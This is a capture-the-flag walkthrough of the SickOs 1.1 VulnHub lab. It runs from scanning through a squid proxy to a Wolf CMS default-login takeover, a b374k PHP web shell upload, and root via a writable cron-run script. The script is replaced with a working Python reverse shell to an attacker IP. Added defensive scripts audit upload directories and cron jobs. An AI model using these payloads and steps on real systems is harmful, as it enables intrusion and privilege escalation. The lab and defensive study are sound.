Here is a quick write-up of SickOs 1.1 from vulnhub.com
https://www.vulnhub.com/entry/sickos-11,132/
Created by D4rk
Run a quick nmap scan to see what we have to work with.
nmap -Pn 192.168.18.146
Starting Nmap 6.40 ( http://nmap.org ) at 2015-12-08 06:35 PST
Nmap scan report for 192.168.18.146
Host is up (0.0044s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
The squid proxy port looks interesting, so I configure my browser to use it. Once configured I am able to reach the internet through it. Let's try accessing the local IP through the proxy.
OK, not much to go on here; looking at the page source shows no clues.
Let's run a quick directory scan using dirb and see if anything interesting shows up.
dirb http://192.168.18.146 /pentest/intelligence-gathering/dictionary/Discovery/Web_Content/common.txt -p 192.168.18.146:3128
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Dec 8 07:12:14 2015
URL_BASE: http://192.168.18.146/
WORDLIST_FILES: /pentest/intelligence-gathering/dictionary/Discovery/Web_Content/common.txt
PROXY: 192.168.18.146:3128
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.18.146/ ----
+ http://192.168.18.146/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.18.146/connect (CODE:200|SIZE:109)
+ http://192.168.18.146/index (CODE:200|SIZE:21)
+ http://192.168.18.146/index.php (CODE:200|SIZE:21)
+ http://192.168.18.146/robots (CODE:200|SIZE:45)
+ http://192.168.18.146/robots.txt (CODE:200|SIZE:45)
+ http://192.168.18.146/server-status (CODE:403|SIZE:295)
-----------------
END_TIME: Tue Dec 8 07:12:17 2015
DOWNLOADED: 4592 - FOUND: 7
Check out robots.txt:
User-agent: *
Disallow: /
Dissalow: /wolfcms
/wolfcms looks interesting; opening it in a browser shows:
I have never heard of wolfcms. Checking exploit-db I see some vulnerabilities, but most seem to require an authenticated user. So let's download the source for wolfcms to see the file structure. From the source I see several directories such as images etc. Looking around those, nothing exciting shows up. So we bring up the admin login page, whose location is determined from the source code.
Just trying the common admin/admin and we are in.
Now let's see if we can upload my preferred PHP shell, b374k, to get CLI access. Let's put it in the images directory.
Now let's see if we can access the newly uploaded file.
We are now in as the www-data user. From b374k I create a reverse shell back to myself to obtain shell access.
/tmp# nc -lvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from [192.168.18.146] port 6666 [tcp/*] accepted (family 2, sport 33912)
b374k shell : connected
/bin/sh: 0: can't access tty; job control turned off
/tmp>ls
b374k_rs
b374k_rs.c
/tmp>whoami
www-data
/tmp>uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
/tmp>
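The upload above works because a directory meant for images accepted a PHP file and the web server then executed it. As an added defensive check, not code from the writeup or from Wolf CMS, here is a Python scan of an upload directory that flags anything that could run as PHP: a PHP extension, a PHP extension buried in a double extension (which some Apache handler configurations still execute), or a PHP open tag inside a file with an innocent extension. Every file name and byte string it creates is a constructed sample, and the extension list is an assumption about a typical Apache PHP handler, not something read from the VM.

```python
import os
import tempfile

# Extensions a typical Apache PHP handler maps to the interpreter (assumption, not from the VM).
PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
PHP_OPEN_TAGS = (b"<?php", b"<?=")


def looks_like_php(path):
    """Return why the file could run as PHP, or None if it looks harmless."""
    name = os.path.basename(path).lower()
    ext = os.path.splitext(name)[1]
    if ext in PHP_EXTENSIONS:
        return "php extension %s" % ext
    # avatar.php.jpg: with AddHandler-style configs the inner extension still wins.
    inner = name.split(".")[1:-1]
    if any("." + part in PHP_EXTENSIONS for part in inner):
        return "php extension inside double extension"
    with open(path, "rb") as fh:
        head = fh.read(4096)
    if any(tag in head for tag in PHP_OPEN_TAGS):
        return "php open tag in content"
    return None


def scan_upload_dir(upload_dir):
    """Walk an upload directory and return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, _, files in os.walk(upload_dir):
        for fname in files:
            full = os.path.join(dirpath, fname)
            reason = looks_like_php(full)
            if reason:
                findings.append((os.path.relpath(full, upload_dir), reason))
    return sorted(findings)


def run_upload_scan_demo():
    """Populate a temporary 'images' directory with constructed samples and scan it."""
    images = os.path.join(tempfile.mkdtemp(), "images")
    os.makedirs(images)
    samples = {  # constructed sample files, not real uploads
        "logo.png": b"\x89PNG\r\n\x1a\n constructed image bytes",
        "upload.php": b"<?php echo 'constructed sample'; ?>",
        "avatar.php.jpg": b"\xff\xd8\xff constructed jpeg bytes",
        "notes.txt": b"plain text then <?php echo 'hidden'; ?>",
    }
    for fname, data in samples.items():
        with open(os.path.join(images, fname), "wb") as fh:
            fh.write(data)
    return scan_upload_dir(images)


if __name__ == "__main__":
    for rel, reason in run_upload_scan_demo():
        print("%s: %s" % (rel, reason))
```

Running this against a real upload directory is a quick post-incident check; the longer-term fix is to serve the upload directory with PHP execution disabled so that a stray .php file is delivered as text rather than run.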
Let's look at the running processes and see if anything stands out.
/var/www>ps -aux
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 3536 1892 ? Ss 20:30 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 20:30 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 20:30 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 20:30 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S 20:30 0:00 [migration/0]
root 8 0.0 0.0 0 0 ? S 20:30 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 20:30 0:00 [rcu_sched]
root 10 0.0 0.0 0 0 ? S 20:30 0:00 [watchdog/0]
root 11 0.0 0.0 0 0 ? S< 20:30 0:00 [khelper]
root 12 0.0 0.0 0 0 ? S 20:30 0:00 [kdevtmpfs]
root 13 0.0 0.0 0 0 ? S< 20:30 0:00 [netns]
root 14 0.0 0.0 0 0 ? S< 20:30 0:00 [writeback]
root 15 0.0 0.0 0 0 ? S< 20:30 0:00 [kintegrityd]
root 16 0.0 0.0 0 0 ? S< 20:30 0:00 [bioset]
root 17 0.0 0.0 0 0 ? S< 20:30 0:00 [kworker/u17:0]
root 18 0.0 0.0 0 0 ? S< 20:30 0:00 [kblockd]
root 19 0.0 0.0 0 0 ? S< 20:30 0:00 [ata_sff]
root 20 0.0 0.0 0 0 ? S 20:30 0:00 [khubd]
root 21 0.0 0.0 0 0 ? S< 20:30 0:00 [md]
root 22 0.0 0.0 0 0 ? S< 20:30 0:00 [devfreq_wq]
root 23 0.0 0.0 0 0 ? S 20:30 0:00 [kworker/0:1]
root 25 0.0 0.0 0 0 ? S 20:30 0:00 [khungtaskd]
root 26 0.0 0.0 0 0 ? S 20:30 0:00 [kswapd0]
root 27 0.0 0.0 0 0 ? SN 20:30 0:00 [ksmd]
root 28 0.0 0.0 0 0 ? SN 20:30 0:00 [khugepaged]
root 29 0.0 0.0 0 0 ? S 20:30 0:00 [fsnotify_mark]
root 30 0.0 0.0 0 0 ? S 20:30 0:00 [ecryptfs-kthrea]
root 31 0.0 0.0 0 0 ? S< 20:30 0:00 [crypto]
root 43 0.0 0.0 0 0 ? S< 20:30 0:00 [kthrotld]
root 45 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_0]
root 46 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_1]
root 49 0.0 0.0 0 0 ? S< 20:30 0:00 [dm_bufio_cache]
root 69 0.0 0.0 0 0 ? S< 20:30 0:00 [deferwq]
root 70 0.0 0.0 0 0 ? S< 20:30 0:00 [charger_manager]
root 71 0.0 0.0 0 0 ? S 20:30 0:00 [kworker/0:2]
root 213 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_2]
root 214 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_3]
root 215 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_4]
root 217 0.0 0.0 0 0 ? S< 20:30 0:00 [mpt_poll_0]
root 222 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_5]
root 223 0.0 0.0 0 0 ? S< 20:30 0:00 [mpt/0]
root 224 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_6]
root 226 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_7]
root 228 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_8]
root 229 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_9]
root 230 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_10]
root 233 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_11]
root 234 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_12]
root 235 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_13]
root 236 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_14]
root 237 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_15]
root 238 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_16]
root 239 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_17]
root 240 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_18]
root 241 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_19]
root 242 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_20]
root 243 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_21]
root 244 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_22]
root 245 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_23]
root 246 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_24]
root 247 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_25]
root 248 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_26]
root 249 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_27]
root 250 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_28]
root 251 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_29]
root 252 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_30]
root 253 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_31]
root 283 0.0 0.0 0 0 ? S 20:30 0:00 [scsi_eh_32]
root 374 0.0 0.0 0 0 ? S 20:30 0:00 [jbd2/sda1-8]
root 375 0.0 0.0 0 0 ? S< 20:30 0:00 [ext4-rsv-conver]
root 376 0.0 0.0 0 0 ? S< 20:30 0:00 [ext4-unrsv-conv]
root 470 0.0 0.0 2832 608 ? S 20:30 0:00 upstart-udev-bridge --daemon
root 473 0.0 0.1 3100 1332 ? Ss 20:30 0:00 /sbin/udevd --daemon
102 559 0.0 0.0 3256 888 ? Ss 20:30 0:00 dbus-daemon --system --fork --activation=upstart
syslog 563 0.0 0.1 30164 1580 ? Sl 20:30 0:00 rsyslogd -c5
root 574 0.0 0.0 0 0 ? S< 20:30 0:00 [ttm_swap]
root 641 0.0 0.0 2976 764 ? S 20:30 0:00 /sbin/udevd --daemon
root 642 0.0 0.0 3096 880 ? S 20:30 0:00 /sbin/udevd --daemon
root 710 0.0 0.0 0 0 ? S< 20:30 0:00 [kpsmoused]
root 769 0.0 0.0 2844 348 ? S 20:30 0:00 upstart-socket-bridge --daemon
root 849 0.0 0.0 2924 404 ? Ss 20:30 0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root 895 0.0 0.2 6680 2408 ? Ss 20:30 0:00 /usr/sbin/sshd -D
root 1016 0.0 0.0 4628 844 tty4 Ss+ 20:30 0:00 /sbin/getty -8 38400 tty4
root 1021 0.0 0.0 4628 844 tty5 Ss+ 20:30 0:00 /sbin/getty -8 38400 tty5
root 1028 0.0 0.0 4628 844 tty2 Ss+ 20:30 0:00 /sbin/getty -8 38400 tty2
root 1029 0.0 0.0 4628 848 tty3 Ss+ 20:30 0:00 /sbin/getty -8 38400 tty3
root 1036 0.0 0.0 4628 856 tty6 Ss+ 20:30 0:00 /sbin/getty -8 38400 tty6
proxy 1061 0.0 1.4 40200 15124 ? Ss 20:30 0:02 /usr/sbin/squid3 -N -YC -f /etc/squid3/squid.conf
root 1062 0.0 0.0 2172 624 ? Ss 20:30 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root 1063 0.0 0.0 2616 932 ? Ss 20:30 0:00 cron
daemon 1064 0.0 0.0 2468 352 ? Ss 20:30 0:00 atd
whoopsie 1084 0.0 0.3 24468 3768 ? Ssl 20:30 0:00 whoopsie
mysql 1107 0.0 3.3 326184 33976 ? Ssl 20:30 0:01 /usr/sbin/mysqld
proxy 1125 0.0 0.0 3220 612 ? Ss 20:30 0:00 (unlinkd)
root 1136 0.0 0.7 37900 7656 ? Ss 20:30 0:00 /usr/sbin/apache2 -k start
www-data 1172 0.0 0.7 38864 7776 ? S 20:30 0:00 /usr/sbin/apache2 -k start
www-data 1174 0.0 0.9 39804 10020 ? S 20:30 0:00 /usr/sbin/apache2 -k start
root 1185 0.0 0.0 4628 848 tty1 Ss+ 20:30 0:00 /sbin/getty -8 38400 tty1
www-data 1379 0.0 0.9 40024 9548 ? S 20:43 0:00 /usr/sbin/apache2 -k start
www-data 1550 0.0 0.8 39768 9052 ? S 21:36 0:00 /usr/sbin/apache2 -k start
root 1554 0.0 0.0 0 0 ? S 21:37 0:00 [kworker/u16:1]
www-data 1596 0.0 0.9 40304 9656 ? S 21:48 0:00 /usr/sbin/apache2 -k start
www-data 1597 0.0 0.8 40412 8552 ? S 21:48 0:00 /usr/sbin/apache2 -k start
www-data 1602 0.0 0.9 40812 10188 ? S 21:48 0:00 /usr/sbin/apache2 -k start
www-data 1614 0.0 0.9 41964 10224 ? S 21:49 0:00 /usr/sbin/apache2 -k start
www-data 1615 0.0 1.0 41312 10532 ? S 21:49 0:00 /usr/sbin/apache2 -k start
www-data 1616 0.0 0.8 40412 8644 ? S 21:49 0:00 /usr/sbin/apache2 -k start
root 1666 0.0 0.0 0 0 ? S 21:55 0:00 [kworker/u16:0]
www-data 1690 0.0 0.0 2232 544 ? S 22:00 0:00 sh -c export TERM=xterm;PS1='$PWD>';export PS1;/bin/sh -i
www-data 1691 0.0 0.0 2232 284 ? S 22:00 0:00 /bin/sh -i
root 1694 0.0 0.0 0 0 ? S 22:00 0:00 [kworker/u16:2]
www-data 1695 0.0 0.0 2232 540 ? S 22:00 0:00 sh -c export TERM=xterm;PS1='$PWD>';export PS1;/bin/sh -i
www-data 1696 0.0 0.0 2232 280 ? S 22:00 0:00 /bin/sh -i
www-data 1767 0.0 0.0 2232 540 ? S 22:01 0:00 sh -c ./b374k_rs 13123 2>&1
www-data 1768 0.0 0.0 2000 284 ? S 22:01 0:00 ./b374k_rs 13123
www-data 1775 0.0 0.0 2232 544 ? S 22:03 0:00 sh -c export TERM=xterm;PS1='$PWD>';export PS1;/bin/sh -i
www-data 1776 0.0 0.0 2232 560 ? S 22:03 0:00 /bin/sh -i
www-data 1790 0.0 0.1 2860 1044 ? R 22:05 0:00 ps -aux
whoopsie looks odd.
Let's take a look at the wolfcms config file.
cat config.php
<?php
// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
Nice. Looking through the mysql tables, nothing interesting pops out. Tried the root password via SSH with no luck, so let's look around a bit.
I see a file in /var/www called connect.py:
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"
Well, that looks like a clue. Let's look for something that could launch this, like cron.
Found a file under /etc/cron.d called automate that runs connect.py as root every minute:
* * * * * root /usr/bin/python /var/www/connect.py
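The real weakness here is that a root cron job executes a script that a low-privileged user can modify. As an added example, not part of the writeup, here is a Python audit that parses /etc/cron.d-style files, picks out the jobs that run as root, and reports any referenced script that is group- or world-writable or owned by an uid outside a trusted set. The cron entry and the files it checks are constructed in a temporary directory that mirrors the writeup's layout (a stand-in interpreter path is used so the demo never touches /usr/bin); on a real host you would call audit_cron_dir("/etc/cron.d") with the default trusted set of just root.

```python
import os
import re
import stat
import tempfile

# /etc/cron.d lines carry a user field between the schedule and the command:
#   * * * * * root /usr/bin/python /var/www/connect.py
CRON_D_LINE = re.compile(
    r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<command>.+)$"
)


def parse_cron_d_file(path):
    """Yield (user, command) for each active job line in a cron.d-style file."""
    with open(path) as fh:
        for line in fh:
            line = line.strip()
            if not line or line.startswith("#"):
                continue                       # blank line or comment
            if "=" in line.split()[0]:
                continue                       # VAR=value line such as SHELL=/bin/sh
            m = CRON_D_LINE.match(line)
            if m:
                yield m.group("user"), m.group("command")


def script_paths(command):
    """Absolute paths referenced by a cron command (interpreter and script alike)."""
    return [tok for tok in command.split() if tok.startswith("/")]


def audit_cron_dir(cron_dir, trusted_uids=frozenset({0})):
    """Return (cron_file, target, reason) for root jobs whose target an untrusted user could change."""
    findings = []
    for name in sorted(os.listdir(cron_dir)):
        cron_file = os.path.join(cron_dir, name)
        if not os.path.isfile(cron_file):
            continue
        for user, command in parse_cron_d_file(cron_file):
            if user != "root":
                continue                       # only root jobs give a privilege jump
            for target in script_paths(command):
                if not os.path.isfile(target):
                    continue
                st = os.stat(target)
                reasons = []
                if st.st_mode & stat.S_IWOTH:
                    reasons.append("world-writable")
                elif st.st_mode & stat.S_IWGRP:
                    reasons.append("group-writable")
                if st.st_uid not in trusted_uids:
                    reasons.append("owned by uid %d" % st.st_uid)
                if reasons:
                    findings.append((name, target, ", ".join(reasons)))
    return findings


def run_cron_audit_demo():
    """Build a constructed /etc/cron.d layout in a temp dir and audit it."""
    root = tempfile.mkdtemp()
    crond = os.path.join(root, "etc", "cron.d")
    www = os.path.join(root, "var", "www")
    os.makedirs(crond)
    os.makedirs(www)
    python = os.path.join(root, "python")             # constructed stand-in interpreter
    connect = os.path.join(www, "connect.py")         # mirrors the writeup's script
    backup = os.path.join(root, "backup.sh")          # a properly protected script
    for p, mode in ((python, 0o755), (connect, 0o777), (backup, 0o755)):
        with open(p, "w") as fh:
            fh.write("# constructed sample\n")
        os.chmod(p, mode)
    with open(os.path.join(crond, "automate"), "w") as fh:
        fh.write("# constructed cron.d file modelled on the writeup's 'automate'\n")
        fh.write("SHELL=/bin/sh\n")
        fh.write("* * * * * root %s %s\n" % (python, connect))  # root runs a 0777 file
        fh.write("0 3 * * * root %s\n" % backup)                  # fine: 0755, trusted owner
        fh.write("*/5 * * * * www-data %s\n" % connect)          # not root, not a finding
    # The demo runs unprivileged, so the current uid is treated as trusted alongside root.
    return audit_cron_dir(crond, trusted_uids=frozenset({0, os.getuid()}))


if __name__ == "__main__":
    for cron_file, target, reason in run_cron_audit_demo():
        print("%s: %s is %s" % (cron_file, target, reason))
```

The audit only looks at the target file's own mode and owner; a complete check would also walk the parent directories, since a writable /var/www lets a user replace connect.py even if the file itself is root-owned and 0644.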
Let's edit the file to see if we can get a reverse shell as the root user.
The modified script:
#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.18.181",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
Now start the nc listener:
nc -lvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from [192.168.18.146] port 1234 [tcp/*] accepted (family 2, sport 34262)
/bin/sh: 0: can't access tty; job control turned off
# # ls
a0216ea4d51874464078c618298b1367.txt
# whoami
root
# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!
ROOT!
You have Succesfully completed SickOS1.1.
Thanks for Trying
This was a lot of fun, thanks for creating it D4rk!